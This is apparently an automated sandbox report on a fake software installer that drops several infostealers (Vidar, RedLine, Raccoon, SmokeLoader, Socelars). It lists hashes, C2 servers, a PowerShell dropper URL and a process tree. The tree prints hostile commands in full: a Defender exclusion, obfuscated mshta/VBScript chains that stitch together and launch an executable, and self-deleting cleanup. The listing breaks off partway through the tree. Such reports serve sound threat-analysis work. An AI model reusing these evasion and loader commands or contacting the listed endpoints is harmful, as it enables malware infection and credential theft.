Resubmissions

08-10-2021 15:07

211008-shl8xsefa9 10

08-10-2021 05:38

211008-gbvqyadce8 10

07-10-2021 18:28

211007-w4jayacge3 10

Analysis

  • max time kernel
    1292s
  • max time network
    1290s
  • platform
    windows10_x64
  • resource
    win10-de-20210920
  • submitted
    08-10-2021 05:38

General

  • Target

    setup_x86_x64_install.exe

  • Size

    5.9MB

  • MD5

    0308d3044eda0db671c58c2a97cb3c10

  • SHA1

    1737ab616a61d35b0bde0aaad949d9894e14be9e

  • SHA256

    b52242da50ea2b3a05f6787dfa7197a0c99442e91d3bc78b71363c2ff3c4f072

  • SHA512

    29902fe4a53319290d18b65a6baa1d747f1389a84cd7eb1a123d05b418b737336cd54c84b76403bc2cbb1f078c19b4461a89eec8214bfcdcf4831bb1dbda0e3e

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Extracted

Family

vidar

Version

41.2

Botnet

916

C2

https://mas.to/@serg4325

Attributes
  • profile_id

    916

Extracted

Family

redline

Botnet

media214

C2

91.121.67.60:2151

Extracted

Family

smokeloader

Version

2020

C2

http://gmpeople.com/upload/

http://mile48.com/upload/

http://lecanardstsornin.com/upload/

http://m3600.com/upload/

http://camasirx.com/upload/

rc4.i32
rc4.i32

Extracted

Family

raccoon

Version

1.8.2

Botnet

3a6818b104313fce1772361ea1977d608ac93da0

Attributes
  • url4cnc

    http://teletop.top/kaba4ello

    http://teleta.top/kaba4ello

    https://t.me/kaba4ello

rc4.plain
rc4.plain

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 2 IoCs
  • Registers COM server for autorun 1 TTPs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 6 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 9 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 63 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Sets DLL path for service in the registry 2 TTPs
  • Checks BIOS information in registry 2 TTPs 6 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Loads dropped DLL 32 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 3 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses Microsoft Outlook accounts 1 TTPs 2 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 16 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 15 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Program Files directory 12 IoCs
  • Drops file in Windows directory 25 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 9 IoCs
  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 4 IoCs
  • Kills process with taskkill 4 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs net.exe
  • Script User-Agent 5 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious behavior: MapViewOfSection 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 7 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
      PID:348
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
      1⤵
      • Drops file in System32 directory
      PID:924
      • C:\Users\Admin\AppData\Roaming\geebvjf
        C:\Users\Admin\AppData\Roaming\geebvjf
        2⤵
        • Executes dropped EXE
        • Checks SCSI registry key(s)
        • Suspicious behavior: MapViewOfSection
        PID:4524
      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe
        C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe
        2⤵
        • Executes dropped EXE
        PID:4276
      • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe
        "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe" /frequentupdate SCHEDULEDTASK displaylevel=False
        2⤵
        • Drops file in System32 directory
        • Modifies data under HKEY_USERS
        • Suspicious use of SetWindowsHookEx
        PID:4364
      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe
        C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe
        2⤵
        • Executes dropped EXE
        PID:4100
      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe
        C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe
        2⤵
        • Executes dropped EXE
        PID:3532
      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe
        C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe
        2⤵
        • Executes dropped EXE
        PID:4268
      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe
        C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe
        2⤵
        • Executes dropped EXE
        PID:4448
      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe
        C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe
        2⤵
        • Executes dropped EXE
        PID:1504
      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe
        C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe
        2⤵
        • Executes dropped EXE
        PID:4080
      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe
        C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe
        2⤵
        • Executes dropped EXE
        PID:4980
      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe
        C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe
        2⤵
        • Executes dropped EXE
        PID:2172
      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe
        C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe
        2⤵
        • Executes dropped EXE
        PID:4908
      • C:\Users\Admin\AppData\Roaming\geebvjf
        C:\Users\Admin\AppData\Roaming\geebvjf
        2⤵
        • Executes dropped EXE
        • Checks SCSI registry key(s)
        • Suspicious behavior: MapViewOfSection
        PID:3312
      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe
        C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe
        2⤵
        • Executes dropped EXE
        PID:4324
      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe
        C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe
        2⤵
        • Executes dropped EXE
        PID:2772
      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe
        C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe
        2⤵
        • Executes dropped EXE
        PID:4732
      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe
        C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe
        2⤵
        • Executes dropped EXE
        PID:4216
      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe
        C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe
        2⤵
        • Executes dropped EXE
        PID:4364
      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe
        C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe
        2⤵
        • Executes dropped EXE
        PID:608
      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe
        C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe
        2⤵
        • Executes dropped EXE
        PID:724
      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe
        C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe
        2⤵
        • Executes dropped EXE
        PID:1264
      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe
        C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe
        2⤵
        • Executes dropped EXE
        PID:4540
      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe
        C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe
        2⤵
        • Executes dropped EXE
        PID:3304
      • C:\Users\Admin\AppData\Roaming\geebvjf
        C:\Users\Admin\AppData\Roaming\geebvjf
        2⤵
        • Executes dropped EXE
        • Checks SCSI registry key(s)
        • Suspicious behavior: MapViewOfSection
        PID:3312
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
      1⤵
        PID:1920
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s SENS
        1⤵
          PID:1476
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Themes
          1⤵
            PID:1332
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s UserManager
            1⤵
              PID:1248
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
              1⤵
                PID:2344
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Browser
                1⤵
                  PID:2568
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                  1⤵
                    PID:2364
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1100
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s BITS
                      1⤵
                      • Suspicious use of SetThreadContext
                      • Modifies registry class
                      PID:3060
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k SystemNetworkService
                        2⤵
                        • Drops file in System32 directory
                        • Checks processor information in registry
                        • Modifies data under HKEY_USERS
                        • Modifies registry class
                        PID:3592
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                      1⤵
                        PID:2692
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                        1⤵
                          PID:2676
                          • C:\Windows\system32\wbem\WMIADAP.EXE
                            wmiadap.exe /F /T /R
                            2⤵
                              PID:4620
                          • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
                            "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
                            1⤵
                            • Suspicious use of WriteProcessMemory
                            PID:1980
                            • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                              "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                              2⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:3264
                              • C:\Users\Admin\AppData\Local\Temp\7zS0CC1A2F5\setup_install.exe
                                "C:\Users\Admin\AppData\Local\Temp\7zS0CC1A2F5\setup_install.exe"
                                3⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Suspicious use of WriteProcessMemory
                                PID:696
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                                  4⤵
                                    PID:812
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                                      5⤵
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:888
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c Thu166f9a8bbe80.exe
                                    4⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:1600
                                    • C:\Users\Admin\AppData\Local\Temp\7zS0CC1A2F5\Thu166f9a8bbe80.exe
                                      Thu166f9a8bbe80.exe
                                      5⤵
                                      • Executes dropped EXE
                                      PID:1844
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c Thu16205451b994.exe /mixone
                                    4⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:1236
                                    • C:\Users\Admin\AppData\Local\Temp\7zS0CC1A2F5\Thu16205451b994.exe
                                      Thu16205451b994.exe /mixone
                                      5⤵
                                      • Executes dropped EXE
                                      PID:2516
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2516 -s 656
                                        6⤵
                                        • Program crash
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:704
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2516 -s 676
                                        6⤵
                                        • Program crash
                                        PID:2104
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2516 -s 728
                                        6⤵
                                        • Program crash
                                        PID:4624
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2516 -s 728
                                        6⤵
                                        • Program crash
                                        PID:4860
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2516 -s 880
                                        6⤵
                                        • Program crash
                                        PID:4520
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2516 -s 936
                                        6⤵
                                        • Program crash
                                        PID:2484
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2516 -s 1140
                                        6⤵
                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                        • Program crash
                                        PID:516
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2516 -s 1212
                                        6⤵
                                        • Program crash
                                        PID:4828
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2516 -s 1240
                                        6⤵
                                        • Program crash
                                        PID:1640
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c Thu161580bf75.exe
                                    4⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:1172
                                    • C:\Users\Admin\AppData\Local\Temp\7zS0CC1A2F5\Thu161580bf75.exe
                                      Thu161580bf75.exe
                                      5⤵
                                      • Executes dropped EXE
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1652
                                      • C:\Users\Admin\AppData\Roaming\5779880.scr
                                        "C:\Users\Admin\AppData\Roaming\5779880.scr" /S
                                        6⤵
                                        • Executes dropped EXE
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1960
                                      • C:\Users\Admin\AppData\Roaming\6338369.scr
                                        "C:\Users\Admin\AppData\Roaming\6338369.scr" /S
                                        6⤵
                                        • Executes dropped EXE
                                        • Adds Run key to start application
                                        PID:1956
                                        • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                          "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                          7⤵
                                          • Executes dropped EXE
                                          PID:4252
                                      • C:\Users\Admin\AppData\Roaming\8179405.scr
                                        "C:\Users\Admin\AppData\Roaming\8179405.scr" /S
                                        6⤵
                                        • Executes dropped EXE
                                        • Checks BIOS information in registry
                                        • Checks whether UAC is enabled
                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:1808
                                      • C:\Users\Admin\AppData\Roaming\7847642.scr
                                        "C:\Users\Admin\AppData\Roaming\7847642.scr" /S
                                        6⤵
                                        • Executes dropped EXE
                                        • Checks BIOS information in registry
                                        • Checks whether UAC is enabled
                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:4140
                                      • C:\Users\Admin\AppData\Roaming\8572326.scr
                                        "C:\Users\Admin\AppData\Roaming\8572326.scr" /S
                                        6⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetThreadContext
                                        PID:4240
                                        • C:\Users\Admin\AppData\Roaming\8572326.scr
                                          "C:\Users\Admin\AppData\Roaming\8572326.scr"
                                          7⤵
                                          • Executes dropped EXE
                                          PID:2564
                                        • C:\Users\Admin\AppData\Roaming\8572326.scr
                                          "C:\Users\Admin\AppData\Roaming\8572326.scr"
                                          7⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          • Accesses Microsoft Outlook accounts
                                          • Accesses Microsoft Outlook profiles
                                          PID:4536
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\8572326.scr"
                                            8⤵
                                              PID:4456
                                              • C:\Windows\SysWOW64\timeout.exe
                                                timeout /T 10 /NOBREAK
                                                9⤵
                                                • Delays execution with timeout.exe
                                                PID:4460
                                        • C:\Users\Admin\AppData\Roaming\8100784.scr
                                          "C:\Users\Admin\AppData\Roaming\8100784.scr" /S
                                          6⤵
                                          • Executes dropped EXE
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4328
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /c Thu1628aafb3efd7c3d.exe
                                      4⤵
                                        PID:1984
                                        • C:\Users\Admin\AppData\Local\Temp\7zS0CC1A2F5\Thu1628aafb3efd7c3d.exe
                                          Thu1628aafb3efd7c3d.exe
                                          5⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          • Checks processor information in registry
                                          PID:620
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /c taskkill /im Thu1628aafb3efd7c3d.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS0CC1A2F5\Thu1628aafb3efd7c3d.exe" & del C:\ProgramData\*.dll & exit
                                            6⤵
                                              PID:4116
                                              • C:\Windows\SysWOW64\taskkill.exe
                                                taskkill /im Thu1628aafb3efd7c3d.exe /f
                                                7⤵
                                                • Kills process with taskkill
                                                PID:3436
                                              • C:\Windows\SysWOW64\timeout.exe
                                                timeout /t 6
                                                7⤵
                                                • Delays execution with timeout.exe
                                                PID:1612
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c Thu165bd34b1e1d4d81.exe
                                          4⤵
                                          • Suspicious use of WriteProcessMemory
                                          PID:2380
                                          • C:\Users\Admin\AppData\Local\Temp\7zS0CC1A2F5\Thu165bd34b1e1d4d81.exe
                                            Thu165bd34b1e1d4d81.exe
                                            5⤵
                                            • Executes dropped EXE
                                            • Modifies system certificate store
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2800
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd.exe /c taskkill /f /im chrome.exe
                                              6⤵
                                                PID:4360
                                                • C:\Windows\SysWOW64\taskkill.exe
                                                  taskkill /f /im chrome.exe
                                                  7⤵
                                                  • Kills process with taskkill
                                                  PID:4708
                                          • C:\Windows\SysWOW64\cmd.exe
                                            C:\Windows\system32\cmd.exe /c Thu16466b26f8b7.exe
                                            4⤵
                                            • Suspicious use of WriteProcessMemory
                                            PID:1208
                                            • C:\Users\Admin\AppData\Local\Temp\7zS0CC1A2F5\Thu16466b26f8b7.exe
                                              Thu16466b26f8b7.exe
                                              5⤵
                                              • Executes dropped EXE
                                              PID:2324
                                          • C:\Windows\SysWOW64\cmd.exe
                                            C:\Windows\system32\cmd.exe /c Thu164ba03be19.exe
                                            4⤵
                                            • Suspicious use of WriteProcessMemory
                                            PID:3440
                                            • C:\Users\Admin\AppData\Local\Temp\7zS0CC1A2F5\Thu164ba03be19.exe
                                              Thu164ba03be19.exe
                                              5⤵
                                              • Executes dropped EXE
                                              • Suspicious use of SetThreadContext
                                              PID:2024
                                              • C:\Users\Admin\AppData\Local\Temp\7zS0CC1A2F5\Thu164ba03be19.exe
                                                C:\Users\Admin\AppData\Local\Temp\7zS0CC1A2F5\Thu164ba03be19.exe
                                                6⤵
                                                • Executes dropped EXE
                                                PID:3444
                                              • C:\Users\Admin\AppData\Local\Temp\7zS0CC1A2F5\Thu164ba03be19.exe
                                                C:\Users\Admin\AppData\Local\Temp\7zS0CC1A2F5\Thu164ba03be19.exe
                                                6⤵
                                                • Executes dropped EXE
                                                PID:396
                                          • C:\Windows\SysWOW64\cmd.exe
                                            C:\Windows\system32\cmd.exe /c Thu1653d94a8da.exe
                                            4⤵
                                              PID:1484
                                              • C:\Users\Admin\AppData\Local\Temp\7zS0CC1A2F5\Thu1653d94a8da.exe
                                                Thu1653d94a8da.exe
                                                5⤵
                                                • Executes dropped EXE
                                                PID:2888
                                                • C:\Windows\SysWOW64\mshta.exe
                                                  "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS0CC1A2F5\Thu1653d94a8da.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS0CC1A2F5\Thu1653d94a8da.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
                                                  6⤵
                                                    PID:2588
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS0CC1A2F5\Thu1653d94a8da.exe" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS0CC1A2F5\Thu1653d94a8da.exe" ) do taskkill /F -Im "%~NxU"
                                                      7⤵
                                                        PID:1892
                                                        • C:\Users\Admin\AppData\Local\Temp\09xU.exE
                                                          09xU.EXE -pPtzyIkqLZoCarb5ew
                                                          8⤵
                                                          • Executes dropped EXE
                                                          PID:4120
                                                          • C:\Windows\SysWOW64\mshta.exe
                                                            "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
                                                            9⤵
                                                              PID:4428
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE" ) do taskkill /F -Im "%~NxU"
                                                                10⤵
                                                                  PID:4672
                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                "C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " , 0 ,TRuE ) )
                                                                9⤵
                                                                  PID:516
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I
                                                                    10⤵
                                                                      PID:3776
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"
                                                                        11⤵
                                                                          PID:4784
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /S /D /c" eCHO "
                                                                          11⤵
                                                                          • Checks SCSI registry key(s)
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          • Suspicious behavior: MapViewOfSection
                                                                          PID:2324
                                                                        • C:\Windows\SysWOW64\control.exe
                                                                          control .\R6f7sE.I
                                                                          11⤵
                                                                            PID:4968
                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                              "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I
                                                                              12⤵
                                                                              • Loads dropped DLL
                                                                              PID:4872
                                                                              • C:\Windows\system32\RunDll32.exe
                                                                                C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I
                                                                                13⤵
                                                                                  PID:4708
                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                    "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I
                                                                                    14⤵
                                                                                    • Loads dropped DLL
                                                                                    PID:3212
                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                        taskkill /F -Im "Thu1653d94a8da.exe"
                                                                        8⤵
                                                                        • Kills process with taskkill
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:4316
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c Thu167d514d2a7ac5a.exe
                                                                4⤵
                                                                • Suspicious use of WriteProcessMemory
                                                                PID:3904
                                                                • C:\Users\Admin\AppData\Local\Temp\7zS0CC1A2F5\Thu167d514d2a7ac5a.exe
                                                                  Thu167d514d2a7ac5a.exe
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  PID:3028
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c Thu16f3de88a335950bb.exe
                                                                4⤵
                                                                • Suspicious use of WriteProcessMemory
                                                                PID:760
                                                                • C:\Users\Admin\AppData\Local\Temp\7zS0CC1A2F5\Thu16f3de88a335950bb.exe
                                                                  Thu16f3de88a335950bb.exe
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  PID:3992
                                                                  • C:\Users\Admin\AppData\Local\Temp\is-R92J6.tmp\Thu16f3de88a335950bb.tmp
                                                                    "C:\Users\Admin\AppData\Local\Temp\is-R92J6.tmp\Thu16f3de88a335950bb.tmp" /SL5="$3012A,1570064,56832,C:\Users\Admin\AppData\Local\Temp\7zS0CC1A2F5\Thu16f3de88a335950bb.exe"
                                                                    6⤵
                                                                    • Executes dropped EXE
                                                                    • Loads dropped DLL
                                                                    PID:2788
                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS0CC1A2F5\Thu16f3de88a335950bb.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\7zS0CC1A2F5\Thu16f3de88a335950bb.exe" /SILENT
                                                                      7⤵
                                                                      • Executes dropped EXE
                                                                      PID:3692
                                                                      • C:\Users\Admin\AppData\Local\Temp\is-QJNBF.tmp\Thu16f3de88a335950bb.tmp
